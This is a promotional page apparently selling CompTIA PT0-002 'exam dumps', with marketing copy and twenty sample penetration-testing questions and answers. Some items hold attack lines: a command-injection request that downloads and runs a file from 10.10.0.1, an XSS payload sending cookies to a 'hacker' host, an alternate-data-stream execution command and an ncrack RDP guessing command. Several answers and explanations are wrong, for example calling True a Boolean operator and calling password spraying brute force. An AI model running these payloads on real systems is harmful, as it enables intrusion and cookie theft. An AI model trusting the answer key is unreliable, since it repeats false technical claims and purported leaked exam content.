Our team of highly skilled and experienced professionals is dedicated to delivering up-to-date and precise study materials in PDF format to our customers. We deeply value both your time and financial investment, and we have spared no effort to provide you with the highest quality work. We ensure that our students consistently achieve a score of more than 95% in the CompTIA PT0-002 exam. We provide only authentic and reliable study material. Our team of professionals is always working very keenly to keep the material updated. Hence, they communicate to the students quickly if there is any change in the PT0-002 dumps file. The CompTIA PT0-002 exam question answers and PT0-002 dumps we offer are as genuine as studying the actual exam content.
24/7 Friendly Approach:
You can reach out to our agents at any time for guidance; we are available 24/7. Our agent will provide you with the information you need, and you can ask them any questions you have. We are here to provide you with the complete study material file you need to pass your PT0-002 exam with extraordinary marks.
Quality Exam Dumps for CompTIA PT0-002:
Pass4surexams provides trusted study material. If you want to achieve sweeping success in your exam, you must sign up for the complete preparation at Pass4surexams, and we will provide you with genuine material that will help you succeed with distinction. Our experts work tirelessly for our customers, ensuring a seamless journey to passing the CompTIA PT0-002 exam on the first attempt. We have already helped a lot of students to ace IT certification exams with our genuine PT0-002 Exam Question Answers. Don't wait; join us today to collect your favorite certification exam study material and get your dream job quickly.
90 Days Free Updates for CompTIA PT0-002 Exam Question Answers and Dumps:
Enroll with confidence at Pass4surexams, and not only will you access our comprehensive CompTIA PT0-002 exam question answers and dumps, but you will also benefit from a remarkable offer: 90 days of free updates. In the dynamic landscape of certification exams, our commitment to your success doesn't waver. If there are any changes or updates to the CompTIA PT0-002 exam content during the 90-day period, rest assured that our team will promptly notify you and provide the latest study materials, ensuring you are thoroughly prepared for success in your exam.
CompTIA PT0-002 Real Exam Questions:
Quality is the heart of our service; that is why we offer our students real exam questions with 100% passing assurance on the first attempt. Our PT0-002 dumps PDF has been crafted by experienced experts on the exact model of the real exam question answers you are going to face to get your certification.
CompTIA PT0-002 Sample Questions
Question # 1
A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client's building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet. Which of the following tools or techniques would BEST support additional reconnaissance?
A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng
Answer: C
Question # 2
Given the following script:

while True:
    print("Hello World")

Which of the following describes True?
A. A while loop
B. A conditional
C. A Boolean operator
D. An arithmetic operator
Answer: C
Explanation: True is a Boolean operator in Python, which is an operator that returns either True or False values based on logical conditions. Boolean operators can be used in expressions or statements that evaluate to True or False values, such as comparisons, assignments, or loops. In the code, True is used as the condition for a while loop, which is a loop that repeats a block of code as long as the condition is True. The code will print "Hello World" indefinitely because True will always be True and the loop will never end. The other options are not valid descriptions of True.
Question # 3
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"

Which of the following commands should the penetration tester run post-engagement?
A. grep -v apache ~/.bash_history > ~/.bash_history
B. rm -rf /tmp/apache
C. chmod 600 /tmp/apache
D. taskkill /IM "apache" /F
Answer: B
Explanation: The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.
Question # 4
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?
A. Alternate data streams
B. PowerShell modules
C. MP4 steganography
D. PsExec
Answer: A
Explanation: Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals. For example, the following command can create an ADS named secret.exe in a file named test.txt and run it using the wmic.exe process call create function:
type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"
Question # 5
Which of the following is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten?
A. NIST SP 800-53
B. ISO 27001
C. GDPR
Answer: C
Explanation: GDPR is a regulatory compliance standard that focuses on user privacy by implementing the right to be forgotten. GDPR stands for General Data Protection Regulation, and it is a law that applies to the European Union and the United Kingdom. GDPR gives individuals the right to request that their personal data be deleted by data controllers and processors under certain circumstances, such as when the data is no longer necessary, when consent is withdrawn, or when the data was unlawfully processed. GDPR also imposes other obligations and rights related to data protection, such as data minimization, data portability, data breach notification, and consent management. The other options are not regulatory compliance standards that focus on user privacy by implementing the right to be forgotten. NIST SP 800-53 is a set of security and privacy controls for federal information systems and organizations in the United States. ISO 27001 is an international standard that specifies the requirements for an information security management system.
Question # 6
During an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?
A. Implementation of patching and change control programs
B. Revision of client scripts used to perform system updates
C. Remedial training for the client's systems administrators
D. Refrainment from patching systems until quality assurance approves
Answer: A
Explanation: The best way to mitigate this issue is to implement patching and change control programs, which are processes that involve applying updates or fixes to software packages to address vulnerabilities, bugs, or performance issues, and managing or documenting the changes made to the software packages to ensure consistency, compatibility, and security. Patching and change control programs can help prevent or reduce the risk of attacks that exploit outdated software package versions, which may contain known or unknown vulnerabilities that can compromise the security or functionality of the systems or servers. Patching and change control programs can be implemented by using tools such as WSUS, which is a tool that can manage and distribute updates for Windows systems and applications, or Git, which is a tool that can track and control changes to source code or files. The other options are not valid ways to mitigate this issue. Revision of client scripts used to perform system updates is not a sufficient way to mitigate this issue, as it may not address the root cause of why the software package versions are outdated, such as lack of awareness, resources, or policies. Remedial training for the client's systems administrators is not a direct way to mitigate this issue, as it may not result in immediate or effective actions to update the software package versions. Refrainment from patching systems until quality assurance approves is not a way to mitigate this issue, but rather a potential cause or barrier for why the software package versions are outdated.
Question # 7
Which of the following OSSTMM testing methodologies should be used to test under the worst conditions?
A. Tandem
B. Reversal
C. Semi-authorized
D. Known environment
Answer: D
Explanation: The OSSTMM testing methodology that should be used to test under the worst conditions is known environment, which is a testing approach that assumes that the tester has full knowledge of the target system or network, such as its architecture, configuration, vulnerabilities, or defenses. Known environment testing can simulate a worst-case scenario, where an attacker has gained access to sensitive information or insider knowledge about the target, and can exploit it to launch more sophisticated or targeted attacks. Known environment testing can also help identify the most critical or high-risk areas of the target, and provide recommendations for improving its security posture. The other options are not OSSTMM testing methodologies that should be used to test under the worst conditions. Tandem is a testing approach that involves two testers working together on the same target, one as an attacker and one as a defender, to simulate a realistic attack scenario and evaluate the effectiveness of the defense mechanisms. Reversal is a testing approach that involves switching roles between the tester and the client, where the tester acts as a defender and the client acts as an attacker, to assess the security awareness and skills of the client. Semi-authorized is a testing approach that involves giving partial or limited authorization or access to the tester, such as a user account or a network segment, to simulate an attack scenario where an attacker has compromised a legitimate user or device.
Question # 8
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
A. Ensure the client has signed the SOW.
B. Verify the client has granted network access to the hot site.
C. Determine if the failover environment relies on resources not owned by the client.
D. Establish communication and escalation procedures with the client.
Answer: A
Explanation: The statement of work (SOW) is a document that defines the scope, objectives, deliverables, and timeline of a penetration testing engagement. It is important to have the client sign the SOW before starting the assessment to avoid any legal or contractual issues.
Question # 9
Which of the following factors would a penetration tester most likely consider when testing at a location?
A. Determine if visas are required.
B. Ensure all testers can access all sites.
C. Verify the tools being used are legal for use at all sites.
D. Establish the time of the day when a test can occur.
Answer: D
Explanation: One of the factors that a penetration tester would most likely consider when testing at a location is to establish the time of day when a test can occur. This factor can affect the scope, duration, and impact of the test, as well as the availability and response of the client and the testers. Testing at different times of day can have different advantages and disadvantages, such as testing during business hours to simulate realistic scenarios and traffic patterns, or testing after hours to reduce disruption and interference. Testing at different locations may also require adjusting for different time zones and daylight saving times. Establishing the time of day when a test can occur can help plan and coordinate the test effectively and avoid confusion or conflict with the client or other parties involved in the test. The other options are not factors that a penetration tester would most likely consider when testing at a location.
Question # 10
Given the following code:

var+img=new+Image();img.src="http://hacker/%20+%20document.cookie";</SCRIPT>

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)
A. Web-application firewall
B. Parameterized queries
C. Output encoding
D. Session tokens
E. Input validation
F. Base64 encoding
Answer: C, E
Explanation: Encoding (commonly called "Output Encoding") involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example translating the < character into the &lt; string when writing to an HTML page. Output encoding and input validation are two of the best methods to prevent against this type of attack, which is known as cross-site scripting (XSS). Output encoding is a technique that converts user-supplied input into a safe format that prevents malicious scripts from being executed by browsers or applications. Input validation is a technique that checks user-supplied input against a set of rules or filters that reject any invalid or malicious data. A web-application firewall is a device or software that monitors and blocks web traffic based on predefined rules or signatures, but it may not catch all XSS attacks. Parameterized queries are a technique that separates user input from SQL statements to prevent SQL injection attacks, but they do not prevent XSS attacks. Session tokens are values that are used to maintain state and identify users across web requests, but they do not prevent XSS attacks. Base64 encoding is a technique that converts binary data into ASCII characters for transmission or storage purposes, but it does not prevent XSS attacks.
Question # 11
A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames found on a text file and the... Which of the following techniques is the penetration tester using?
A. Password brute force attack
B. SQL injection
C. Password spraying
D. Kerberoasting
Answer: A
Explanation: The penetration tester is using a password brute force attack, which is a type of password guessing attack that involves trying many possible combinations of passwords against a single username or account. A password brute force attack can be effective when the password is known to be weak, simple, or predictable, such as a default or temporary password. In this case, the penetration tester knows that the help desk analysts change users' passwords to 123change when they request password resets, and decides to brute force the webmail with this password and a list of usernames. A password brute force attack can be done by using tools such as Hydra, which can perform parallelized login attacks against various protocols and services. The other options are not techniques that the penetration tester is using. SQL injection is a type of attack that exploits a vulnerability in a web application that allows an attacker to execute malicious SQL statements on a database server. Password spraying is a type of password guessing attack that involves trying one or a few common passwords against many usernames or accounts. Kerberoasting is a type of attack that exploits a vulnerability in the Kerberos authentication protocol that allows an attacker to request and crack service tickets for service accounts with weak passwords.
Question # 12
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress › ReadMe</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?
A. Burp Suite
B. DirBuster
C. WPScan
D. OWASP ZAP
Answer: C
Explanation: WPScan is a tool that can be used to scan WordPress sites for vulnerabilities, such as outdated plugins, themes, or core files, misconfigured settings, weak passwords, or user enumeration. The curl command reveals that the site is running WordPress and has a readme.html file that may disclose the version number. Therefore, WPScan would be the best tool to use to explore this site further. Burp Suite is a tool that can be used to intercept and modify web requests and responses, but it does not specialize in WordPress scanning. DirBuster is a tool that can be used to brute-force directories and files on web servers, but it does not exploit WordPress vulnerabilities. OWASP ZAP is a tool that can be used to perform web application security testing, but it does not focus on WordPress scanning.
Reference: https://tools.kali.org/web-applications/burpsuite
Question # 13
When accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:

..d index: eid in /apache/www/validate/user.php line 12
..d index: uid in /apache/www/validate/user.php line 13
..d index: pw in /apache/www/validate/user.php line 14
..d index: acl in /apache/www/validate/user.php line 15

A. Lack of code signing
B. Incorrect command syntax
C. Insufficient error handling
D. Insecure data transmission
Answer: C
Explanation: The most probable cause for this output is insufficient error handling, which is a coding flaw that occurs when a program does not handle errors or exceptions properly or gracefully. Insufficient error handling can result in unwanted or unexpected behavior, such as crashes, hangs, or leaks. In this case, the output shows that the program is displaying warning messages that indicate undefined indexes in the user.php file. These messages reveal the names of the variables and the file path that are used by the program, which can expose sensitive information or clues to an attacker. The program should have implemented error handling mechanisms, such as try-catch blocks, error logging, or sanitizing output, to prevent these messages from being displayed or to handle them appropriately. The other options are not plausible causes for this output. Lack of code signing is a security flaw that occurs when a program does not have a digital signature that verifies its authenticity and integrity. Incorrect command syntax is a user error that occurs when a command is entered with wrong or missing parameters or options. Insecure data transmission is a security flaw that occurs when data is sent over a network without encryption or protection.
Question # 14
A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet." Which of the following audiences was this message intended for?
A. Systems administrators
B. C-suite executives
C. Data privacy ombudsman
D. Regulatory officials
Answer: B
Explanation: The comment in the final report was intended for C-suite executives, which are senior-level managers or leaders in an organization, such as the chief executive officer (CEO), chief financial officer (CFO), or chief information officer (CIO). C-suite executives are typically interested in high-level summaries or overviews of the penetration test results, such as the percentage of systems affected by a certain vulnerability or risk, the potential impact or cost of a breach, or the recommended actions or priorities for remediation. C-suite executives may not have the technical background or expertise to understand detailed or technical information about the penetration test, such as specific vulnerabilities, exploits, tools, or techniques. The comment in the final report provides a high-level summary of the penetration test result that is relevant and understandable for C-suite executives. The other audiences are not likely to be interested in this comment. Systems administrators are technical staff who are responsible for installing, configuring, maintaining, and securing systems and networks. They would be more interested in detailed or technical information about the penetration test, such as specific vulnerabilities, exploits, tools, or techniques. A data privacy ombudsman is a person who acts as an independent mediator between individuals and organizations regarding data privacy issues or complaints. They would be more interested in information about how the penetration test complied with data privacy laws and regulations, such as GDPR or CCPA. Regulatory officials are authorities who enforce compliance with laws and regulations related to a specific industry or sector, such as finance, health care, or energy. They would be more interested in information about how the penetration test complied with industry-specific standards and frameworks, such as PCI-DSS, HIPAA, or NERC-CIP.
Question # 15
A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?
A. ftp 192.168.53.23
B. smbclient \\\\WEB3\\IPC$ -I 192.168.53.23 -U guest
C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp 192.168.53.23
D. curl -X TRACE https://192.168.53.23:8443/index.aspx
E. nmap --script vuln -sV 192.168.53.23
Answer: A
Question # 16
In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name-serial_number>. Which of the following would be the best action for the tester to take NEXT with this information?
A. Create a custom password dictionary as preparation for password spray testing.
B. Recommend using a password manager/vault instead of text files to store passwords securely.
C. Recommend configuring password complexity rules in all the systems and applications.
D. Document the unprotected file repository as a finding in the penetration-testing report.
Answer: D
Question # 17
Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?
A. dig company.com MX
B. whois company.com
C. curl www.company.com
D. dig company.com A
Answer: A
Explanation: The dig command is a tool that can be used to query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records. The MX option specifies that the query is for mail exchange records, which are records that indicate the mail servers responsible for accepting email messages for a domain. Therefore, the command dig company.com MX would best help the tester determine which cloud email provider the log-in page needs to mimic by showing the mail servers for company.com. For example, if the output shows something like company-com.mail.protection.outlook.com, then it means that company.com uses Microsoft Outlook as its cloud email provider. The other commands are not as useful for determining the cloud email provider. The whois command is a tool that can be used to query domain name registration information, such as the owner, registrar, or expiration date of a domain. The curl command is a tool that can be used to transfer data from or to a server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A option specifies that the query is for address records, which are records that map domain names to IP addresses.
Question # 18
During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames. Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?
A. Sniff and then crack the WPS PIN on an associated WiFi device.
B. Dump the user address book on the device.
C. Break a connection between two Bluetooth devices.
D. Transmit text messages to the device.
Answer: B
Explanation: Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs. This allows access to calendars, contact lists, emails and text messages, and on some phones, users can copy pictures and private videos.
Question # 19
A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?
A. Test the strength of the encryption settings.
B. Determine if security tokens are easily available.
C. Perform a vulnerability check against the hypervisor.
D. Scan the containers for open ports.
Answer: D
Explanation: The first step that a tester should perform to determine if the new containers are configured correctly against a DDoS attack is to scan the containers for open ports. Open ports are entry points for network communication and can expose services or applications that may be vulnerable to DDoS attacks. Scanning the containers for open ports can help the tester identify which services or applications are running on the containers, and which ones may need to be secured or disabled to prevent DDoS attacks. Scanning the containers for open ports can also help the tester discover any unauthorized or malicious services or applications that may have been installed on the containers by previous attackers or compromised containers. Scanning the containers for open ports can be done by using tools such as Nmap, which can perform network scanning and enumeration by sending packets to hosts and analyzing their responses. The other options are not the first steps that a tester should perform to determine if the new containers are configured correctly against a DDoS attack. Testing the strength of the encryption settings is not relevant to DDoS attacks, as encryption does not prevent or mitigate DDoS attacks, but rather protects data confidentiality and integrity. Determining if security tokens are easily available is not relevant to DDoS attacks, as security tokens are used for authentication and authorization, not for preventing or mitigating DDoS attacks. Performing a vulnerability check against the hypervisor is not relevant to DDoS attacks, as the hypervisor is not directly exposed to network traffic, but rather manages the virtual machines or containers that run on it.
Question # 20
A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?
A. Dumpster diving
B. Phishing
C. Shoulder surfing
D. Tailgating
Answer: A
Explanation: The penetration tester should try dumpster diving next, which is an attack that involves searching through trash bins or dumpsters for discarded documents or items that may contain sensitive or useful information. Dumpster diving can reveal information such as passwords, account numbers, credit card numbers, invoices, receipts, memos, contracts, or employee records. The penetration tester can use this information to gain access to systems or networks, impersonate users or employees, or perform social engineering attacks. The other options are not likely attacks that the penetration tester should try next based on the discovery that the company does not have a shredding service. Phishing is an attack that involves sending fraudulent emails that appear to be from legitimate sources to trick users into revealing their credentials or clicking on malicious links or attachments. Shoulder surfing is an attack that involves observing or spying on users while they enter their credentials or perform other tasks on their devices. Tailgating is an attack that involves following authorized personnel into a restricted area without proper authorization or identification.